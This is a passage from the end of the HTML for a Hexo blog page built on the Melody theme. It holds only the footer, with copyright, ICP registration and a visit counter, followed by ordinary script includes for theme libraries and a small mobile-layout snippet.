})(document, 'script');</script></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>